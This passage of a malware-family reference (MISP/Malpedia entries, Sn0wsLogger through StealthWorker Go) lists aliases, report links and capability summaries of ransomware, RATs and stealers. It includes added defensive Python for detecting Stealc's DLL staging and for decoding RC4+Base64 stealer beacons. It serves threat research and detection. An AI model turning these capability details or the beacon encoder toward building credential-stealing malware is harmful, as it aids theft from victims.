https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore

https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo

https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.101_ENG.pdf

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://asec.ahnlab.com/en/33600/

https://embee-research.ghost.io/combining-pivot-points-to-identify-malware-infrastructure-redline-smokeloader-and-cobalt-strike/

https://www.cisa.gov/uscert/ncas/alerts/aa22-110a

https://blog.cluster25.duskrise.com/2023/10/12/cve-2023-38831-russian-attack

http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html

https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://unit42.paloaltonetworks.com/analysis-of-smoke-loader-in-new-tsunami-campaign/

https://intel471.com/blog/privateloader-malware

https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US

https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/

Sn0wsLogger

The tag is: misp-galaxy:malpedia="Sn0wsLogger"

Sn0wsLogger is also known as:

Table 4612. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sn0wslogger

https://twitter.com/struppigel/status/1354806038805897216

Snake

Snake Ransomware is a Golang ransomware reportedly containing obfuscation not typically seen in Golang ransomware. This malware will remove shadow copies and kill processes related to SCADA/ICS devices, virtual machines, remote management tools, network management software, and others. After this, encryption of files on the device commences, while skipping Windows system folders and various system files. A random 5 character string is appended to encrypted files. According to Bleeping Computer, this ransomware takes an especially long time to encrypt files on a targeted machine. This ransomware is reported to target an entire network, rather than individual workstations.

The tag is: misp-galaxy:malpedia="Snake"

Snake is also known as:

  • EKANS

  • SNAKEHOSE

Table 4613. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.snake

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/

https://www.0ffset.net/reverse-engineering/analysing-snake-ransomware/

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/

https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/

https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/

https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/

https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/

https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/

https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html

https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md

https://twitter.com/bad_packets/status/1270957214300135426

https://twitter.com/milkr3am/status/1270019326976786432

https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/

https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware

https://www.goggleheadedhacker.com/blog/post/22

https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/

https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf

https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017

https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

Snojan

The tag is: misp-galaxy:malpedia="Snojan"

Snojan is also known as:

Table 4619. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan

https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9

SnowFlake Stealer

Information stealer, written in Rust.

The tag is: misp-galaxy:malpedia="SnowFlake Stealer"

SnowFlake Stealer is also known as:

Table 4620. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.snowflake_stealer

https://github.com/Finch4/Malware-Analysis-Reports/blob/master/SnowFlake%20Stealer/SnowFlake%20Stealer%20Analysis.pdf

SNS Locker

The tag is: misp-galaxy:malpedia="SNS Locker"

SNS Locker is also known as:

Table 4621. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker

Sobaken

According to ESET, this RAT was derived from (the open-source) Quasar RAT.

The tag is: misp-galaxy:malpedia="Sobaken"

Sobaken is also known as:

Table 4622. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken

https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/

Sobig

The tag is: misp-galaxy:malpedia="Sobig"

Sobig is also known as:

  • Palyh

Table 4623. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig

http://edition.cnn.com/2003/TECH/internet/08/21/sobig.virus/index.html

Sockbot

Sockbot is a customized fork, written in Go, of the open-source Ligolo reverse tunneling tool. The threat actors who rewrote the code made several modifications, e.g. execution checks and hardcoded values. Ligolo: https://github.com/sysdream/ligolo

The tag is: misp-galaxy:malpedia="Sockbot"

Sockbot is also known as:

Table 4625. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sockbot

https://www.bleepingcomputer.com/news/security/hackers-fork-open-source-reverse-tunneling-tool-for-persistence/

https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf

https://www.youtube.com/watch?v=CAMnuhg-Qos

SodaMaster

This is a RAT that is usually loaded via shellcode and/or reflective DLL injection. The RAT uses RC4 or a hardcoded RSA key for traffic encryption/decryption. Its communication can happen either over a raw TCP socket or via an HTTP POST request. Depending on the version, the RAT may remotely execute DLLs or shellcode.

The tag is: misp-galaxy:malpedia="SodaMaster"

SodaMaster is also known as:

  • DelfsCake

  • HEAVYPOT

  • dfls

Table 4628. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks

https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf

https://securelist.com/apt-trends-report-q1-2021/101967/

https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf

https://www.bleepingcomputer.com/news/security/chinese-hackers-abuse-vlc-media-player-to-launch-malware-loader/

solarmarker

Unit 42 notes that they identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.

Some of SolarMarker’s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims’ web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server.

The malware invests significant effort into defense evasion, which consists of techniques like signed files, huge files, impersonation of legitimate software installations and obfuscated PowerShell scripts.

The tag is: misp-galaxy:malpedia="solarmarker"

solarmarker is also known as:

  • Jupyter

  • Polazert

  • Yellow Cockatoo

Table 4631. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker

https://unit42.paloaltonetworks.com/solarmarker-malware/

https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html

https://twitter.com/MsftSecIntel/status/1403461397283950597

https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/

https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more

https://embee-research.ghost.io/shodan-censys-queries/

https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html

https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction

https://www.prodaft.com/m/reports/Solarmarker_TLPWHITEv2.pdf

https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/

https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer

https://squiblydoo.blog/2021/06/20/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/

https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/

https://www.cisecurity.org/insights/blog/top-10-malware-march-2022

https://blogs.blackberry.com/en/2022/01/threat-thursday-jupyter-infostealer-is-a-master-of-disguise

https://squiblydoo.blog/2022/09/27/solarmarker-the-old-is-new/

https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/

https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-solarmarker

https://blog.minerva-labs.com/new-iocs-of-jupyter-stealer

SolidBit

Ransomware, written in .NET.

The tag is: misp-galaxy:malpedia="SolidBit"

SolidBit is also known as:

Table 4632. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.solidbit

https://www.trendmicro.com/en_us/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamer.html

Somnia

The tag is: misp-galaxy:malpedia="Somnia"

Somnia is also known as:

Table 4634. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.somnia

https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65

soraya

The tag is: misp-galaxy:malpedia="soraya"

soraya is also known as:

Table 4636. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya

https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper

SPACESHIP

SPACESHIP searches for files with a specified set of file extensions and copies them to a removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive, which could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is then used to steal documents from the air-gapped system, copying them to a removable drive inserted into the SPACESHIP-infected system.

The tag is: misp-galaxy:malpedia="SPACESHIP"

SPACESHIP is also known as:

Table 4641. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship

https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Spartacus

Spartacus is ransomware written in .NET and emerged in the first half of 2018.

The tag is: misp-galaxy:malpedia="Spartacus"

Spartacus is also known as:

Table 4647. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spartacus

https://bartblaze.blogspot.com/2018/04/this-is-spartacus-new-ransomware-on.html

SPECTRALVIPER

The tag is: misp-galaxy:malpedia="SPECTRALVIPER"

SPECTRALVIPER is also known as:

Table 4648. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spectralviper

https://www.elastic.co/fr/security-labs/elastic-charms-spectralviper

Spectre Rat

Mixed RAT and botnet malware sold on underground forums. In March 2021 it was advertised as Spectre 2.0; it reached version 3 in June 2021 and then quickly version 4. This crimeware tool was being abused in malicious campaigns targeting European users in September 2021.

The tag is: misp-galaxy:malpedia="Spectre Rat"

Spectre Rat is also known as:

Table 4649. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spectre

https://yoroi.company/research/spectre-v4-0-the-speed-of-malware-threats-after-the-pandemics/

SPHijacker

According to Trend Micro, this is a tool designed to disable security products, adopting two approaches to achieve this purpose. One approach terminates the security product process by using a vulnerable driver, zamguard64.sys, published by Zemana (vulnerability designated as CVE-2018-5713). Meanwhile, another approach disables process launching by using a new technique that they named stack rumbling.

The tag is: misp-galaxy:malpedia="SPHijacker"

SPHijacker is also known as:

Table 4651. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sphijacker

https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html

Spicy Hot Pot

The tag is: misp-galaxy:malpedia="Spicy Hot Pot"

Spicy Hot Pot is also known as:

Table 4652. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spicyhotpot

https://www.crowdstrike.com/blog/spicy-hot-pot-rootkit-explained/

SpyBot

The tag is: misp-galaxy:malpedia="SpyBot"

SpyBot is also known as:

Table 4655. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot

SpyEye

SpyEye is a malware targeting both Microsoft Windows browsers and Apple iOS Safari. Originating in Russia, it was sold on underground forums for $500+ and marketed as "The Next Zeus Malware". It offered many functions typical of banking trojans, such as keylogging, auto-fill credit card modules, email backups, encrypted config files, HTTP access, POP3 grabbers and FTP grabbers. SpyEye allowed attackers to steal money from online bank accounts and initiate transactions even while valid users were logged into their bank account.

The tag is: misp-galaxy:malpedia="SpyEye"

SpyEye is also known as:

Table 4657. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye

https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393

https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/

https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html

http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye

https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/

https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html

https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals

Squirrelwaffle

According to Sophos, Squirrelwaffle is a malware loader that is distributed as a malicious Office document in spam campaigns. It provides attackers with an initial foothold in a victim’s environment and a channel to deliver and infect systems with other malware. When a recipient opens a Squirrelwaffle-infected document and enables macros, a Visual Basic script typically downloads and executes malicious files and scripts, giving further control of the computer to an attacker. Squirrelwaffle operators also use DocuSign to try to trick the user into enabling macros in Office documents.

The tag is: misp-galaxy:malpedia="Squirrelwaffle"

Squirrelwaffle is also known as:

  • DatopLoader

Table 4658. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle

https://redcanary.com/blog/intelligence-insights-november-2021/

https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html

https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan

https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf

https://www.malware-traffic-analysis.net/2021/09/17/index.html

https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html

https://redcanary.com/blog/intelligence-insights-december-2021

https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/the-newest-malicious-actor-squirrelwaffle-malicious-doc/

https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf

https://twitter.com/Max_Mal_/status/1442496131410190339

https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot

https://www.cynet.com/understanding-squirrelwaffle/

https://blogs.blackberry.com/en/2021/11/threat-thursday-squirrelwaffle-loader

https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/

https://security-soup.net/squirrelwaffle-maldoc-analysis/

https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/

https://www.youtube.com/watch?v=9X2P7aFKSw0

https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike

https://twitter.com/jhencinski/status/1464268732096815105

https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/

https://certitude.consulting/blog/en/unpatched-exchange-servers-distribute-phishing-links-squirrelwaffle/

https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9

https://www.sentinelone.com/blog/is-squirrelwaffle-the-new-emotet-how-to-detect-the-latest-malspam-loader/

SquirtDanger

According to PaloAlto, SquirtDanger is a commodity botnet malware family that comes equipped with a number of characteristics and capabilities. The malware is written in C# (C Sharp) and has multiple layers of embedded code. Once run on the system, it will persist via a scheduled task that is set to run every minute. SquirtDanger uses raw TCP connections to a remote command and control (C2) server for network communications.

The tag is: misp-galaxy:malpedia="SquirtDanger"

SquirtDanger is also known as:

Table 4659. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger

https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/

sRDI

sRDI allows for the conversion of DLL files to position independent shellcode. It attempts to be a fully functional PE loader supporting proper section permissions, TLS callbacks, and sanity checks. It can be thought of as a shellcode PE loader strapped to a packed DLL.

The tag is: misp-galaxy:malpedia="sRDI"

sRDI is also known as:

  • DAVESHELL

Table 4660. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.srdi

https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing

https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing

https://github.com/monoxgas/sRDI

https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/

StalinLocker

The tag is: misp-galaxy:malpedia="StalinLocker"

StalinLocker is also known as:

  • StalinScreamer

Table 4664. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stalin_locker

https://www.bleepingcomputer.com/news/security/stalinlocker-deletes-your-files-unless-you-enter-the-right-code/

StarCruft

The tag is: misp-galaxy:malpedia="StarCruft"

StarCruft is also known as:

Table 4666. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft

https://securelist.com/operation-daybreak/75100/

StartPage

Potentially unwanted program that changes the startpage of browsers to induce ad impressions.

The tag is: misp-galaxy:malpedia="StartPage"

StartPage is also known as:

  • Easy Television Access Now

Table 4669. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage

https://www.bleepingcomputer.com/virus-removal/remove-search-searchetan.com-chrome-new-tab-page

Stealc

Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth’s statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline.

Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
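The DLL list above is the most concrete hunting lead in the description: the seven files are legitimate (SQLite, Mozilla NSS, the MSVC runtime), so the signal is not the file names but an unknown process dropping several of them into a user-writable directory shortly after it starts. The following is an added example (not code from Malpedia or from the Sekoia reports) that runs that check over constructed file-create events; the event format, the trusted-directory prefixes, the threshold and all paths are assumptions made for the example.

```python
import ntpath
from collections import defaultdict

# The seven support DLLs named in the description. Legitimate installers ship
# them too, so the detection is "several of them, written by one process,
# outside the usual install locations".
STEALC_SUPPORT_DLLS = frozenset({
    "sqlite3.dll", "nss3.dll", "vcruntime140.dll", "mozglue.dll",
    "freebl3.dll", "softokn3.dll", "msvcp140.dll",
})

# Assumed: directories where legitimate installers routinely write these DLLs.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed file-create events (timestamp|pid|image|target). Not real telemetry.
SAMPLE_EVENTS = [
    r"2024-01-15T09:02:11|4412|C:\Users\alice\AppData\Local\Temp\build.exe|C:\ProgramData\sqlite3.dll",
    r"2024-01-15T09:02:11|4412|C:\Users\alice\AppData\Local\Temp\build.exe|C:\ProgramData\nss3.dll",
    r"2024-01-15T09:02:12|4412|C:\Users\alice\AppData\Local\Temp\build.exe|C:\ProgramData\mozglue.dll",
    r"2024-01-15T09:02:12|4412|C:\Users\alice\AppData\Local\Temp\build.exe|C:\ProgramData\freebl3.dll",
    r"2024-01-15T09:02:12|4412|C:\Users\alice\AppData\Local\Temp\build.exe|C:\ProgramData\softokn3.dll",
    r"2024-01-15T09:02:13|4412|C:\Users\alice\AppData\Local\Temp\build.exe|C:\ProgramData\report.txt",
    # A browser installer writes the same NSS DLLs, but into Program Files: benign.
    r"2024-01-15T09:05:40|1980|C:\Users\alice\Downloads\firefox_setup.exe|C:\Program Files\Mozilla Firefox\nss3.dll",
    r"2024-01-15T09:05:40|1980|C:\Users\alice\Downloads\firefox_setup.exe|C:\Program Files\Mozilla Firefox\mozglue.dll",
    r"2024-01-15T09:05:41|1980|C:\Users\alice\Downloads\firefox_setup.exe|C:\Program Files\Mozilla Firefox\freebl3.dll",
    r"2024-01-15T09:05:41|1980|C:\Users\alice\Downloads\firefox_setup.exe|C:\Program Files\Mozilla Firefox\softokn3.dll",
    # A single runtime DLL in Temp is below the threshold on its own.
    r"2024-01-15T09:07:02|2201|C:\Program Files\App\app.exe|C:\Users\alice\AppData\Local\Temp\vcruntime140.dll",
]


def parse_event(line: str) -> dict:
    """Split one constructed event line into its four fields."""
    ts, pid, image, target = line.split("|", 3)
    return {"ts": ts, "pid": int(pid), "image": image, "target": target}


def is_trusted_location(path: str) -> bool:
    """True when the target path sits under an assumed legitimate install directory."""
    return path.lower().startswith(TRUSTED_PREFIXES)


def find_dll_staging(lines, threshold: int = 3) -> dict:
    """Return {(pid, image): [dll, ...]} for processes that wrote at least
    `threshold` distinct DLLs from the set outside trusted locations."""
    seen = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        # ntpath handles Windows separators regardless of the host OS.
        name = ntpath.basename(ev["target"]).lower()
        if name in STEALC_SUPPORT_DLLS and not is_trusted_location(ev["target"]):
            seen[(ev["pid"], ev["image"])].add(name)
    return {proc: sorted(names) for proc, names in seen.items() if len(names) >= threshold}


if __name__ == "__main__":
    for (pid, image), dlls in find_dll_staging(SAMPLE_EVENTS).items():
        print(f"pid {pid} {image} staged {len(dlls)} browser-support DLLs: {', '.join(dlls)}")
```

Portable applications that bundle their own SQLite or NSS can also drop these files into user directories, so in production the image path should be checked against an allowlist or signer information before alerting; the threshold is deliberately below seven because the description says the DLLs are fetched individually and a partial download already indicates the behaviour.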

The tag is: misp-galaxy:malpedia="Stealc"

Stealc is also known as:

Table 4672. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/

https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_config_extractor.ipynb

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_string_decryption.py

https://glyc3rius.github.io/2023/10/stealc/

https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/

https://www.esentire.com/blog/stealc-delivered-via-deceptive-google-sheets

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af

Stealerium

According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP addresses. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes and malware analysis tools, and checking whether the process is being debugged. The malware also embeds a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor’s addresses when the victim makes a transaction. The stolen information is sent to a Discord channel via a Discord webhook.

The tag is: misp-galaxy:malpedia="Stealerium"

Stealerium is also known as:

Table 4673. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium

https://resources.securityscorecard.com/research/stealerium-detailed-analysis

https://github.com/Stealerium/Stealerium

Stealer0x3401

According to PTSecurity, this stealer harvests system information which is then RC4 encrypted and Base64 encoded before sending it to the C2 server.
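Both SodaMaster above (RC4 traffic encryption) and Stealer0x3401 (RC4, then Base64, before the system information is sent) use the same transport pipeline, so one decoder serves both. The following is an added example, not code from Malpedia or from the referenced reports: a textbook RC4 implementation, the encode/decode pair an analyst needs to reproduce and reverse the beacon, and a printable-text heuristic for checking candidate keys. The key and the system-information string are constructed for the demonstration; the real key has to be recovered from the sample.

```python
import base64
from typing import Iterable, Optional

# Hypothetical values used only to exercise the code.
HYPOTHETICAL_KEY = b"example-rc4-key"
CONSTRUCTED_SYSINFO = b"host=WS01;user=alice;os=Windows 10;build=19045;ip=10.0.0.5"


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key-scheduling (KSA) followed by keystream generation (PRGA).

    RC4 is symmetric, so the same call encrypts and decrypts.
    """
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):  # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # PRGA, XORed into the data as it is produced
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def encode_beacon(key: bytes, plaintext: bytes) -> str:
    """Implant side, as described: RC4-encrypt, then Base64-encode for transport."""
    return base64.b64encode(rc4(key, plaintext)).decode("ascii")


def decode_beacon(key: bytes, body: str) -> bytes:
    """Analyst side: Base64-decode the captured body, then RC4-decrypt it."""
    try:
        raw = base64.b64decode(body, validate=True)
    except ValueError as exc:  # binascii.Error is a ValueError subclass
        raise ValueError("captured body is not valid Base64") from exc
    return rc4(key, raw)


def looks_like_text(data: bytes, min_ratio: float = 0.95) -> bool:
    """Heuristic for judging a candidate key: system-information fields decrypt
    to mostly printable ASCII, while a wrong key yields random-looking bytes."""
    if not data:
        return False
    printable = sum(1 for b in data if 0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D))
    return printable / len(data) >= min_ratio


def recover_with_candidates(body: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Try candidate keys (e.g. strings pulled from the unpacked binary) and
    return the first decryption that looks like plaintext, or None."""
    for key in candidates:
        plain = decode_beacon(key, body)
        if looks_like_text(plain):
            return plain
    return None


if __name__ == "__main__":
    body = encode_beacon(HYPOTHETICAL_KEY, CONSTRUCTED_SYSINFO)
    print("wire body :", body)
    print("recovered :", recover_with_candidates(body, [b"wrong-guess", HYPOTHETICAL_KEY]))
```

RC4 gives no integrity protection and the keystream depends only on the key, so two beacons encrypted under the same key can be XORed together to cancel the keystream; that is why a known-plaintext field such as a hostname is often enough to confirm a key guess even before the full plaintext is readable.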

The tag is: misp-galaxy:malpedia="Stealer0x3401"

Stealer0x3401 is also known as:

Table 4674. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stealer_0x3401

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks

StealthWorker Go

According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before attackers can embed a skimmer, however, they first need access to their target’s backend. Attackers commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target’s system. Another, simpler option is a brute-force attack. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.

The tag is: misp-galaxy:malpedia="StealthWorker Go"

StealthWorker Go is also known as:

Table 4675. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker

https://www.bleepingcomputer.com/news/security/synology-warns-of-malware-infecting-nas-devices-with-ransomware/

